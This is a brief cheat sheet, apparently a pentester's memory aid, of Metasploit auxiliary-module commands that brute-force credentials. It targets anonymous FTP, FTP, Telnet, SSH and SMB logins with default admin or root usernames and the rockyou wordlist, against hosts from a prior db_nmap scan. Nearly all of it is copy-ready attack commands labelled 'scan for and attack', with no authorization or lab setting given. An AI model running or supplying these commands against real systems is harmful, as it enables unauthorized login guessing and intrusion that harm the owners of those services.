The modules that we use are specific to our needs. But these are the most commonly used from my recent history. This list is super generic and mostly to supplement my poor memory.
These methods/modules rely on a previously completed db_nmap scan. So our targets are readily available from the DB rather than scanning for them now. The ‘rockyou’ password list can be found here “https://gitlab.com/kalilinux/packages/wordlists/-/raw/kali/master/rockyou.txt.gz”.
Scan for and attack Anonymous FTP:
use auxiliary/scanner/ftp/anonymous services -p 21 -u -R set THREADS 30 spool console-ftpa.log run
Scan for and attack FTP using the ‘admin’ user:
use auxiliary/scanner/ftp/ftp_login services -p 21 -u -R set THREADS 30 set PASS_FILE ./rockyou.txt set USERNAME admin spool console-ftp.log run
Scan for and attack Telnet using the ‘admin’ user:
use auxiliary/scanner/telnet/telnet_login services -p 23 -u -R set THREADS 30 set PASS_FILE ./rockyou.txt set USERNAME admin spool console-tel.log run
Scan for and attack SSH using the ‘root’ user:
use auxiliary/scanner/ssh/ssh_login services -p 22 -u -R set THREADS 30 set PASS_FILE ./rockyou.txt set USERNAME root spool console-ssh.log run
Scan for and attack SMB using the ‘administrator’ user:
use auxiliary/scanner/smb/smb_login services -p 445 -u -R set THREADS 30 set PASS_FILE ./rockyou.txt set SMBUser administrator spool console-ssh.log run
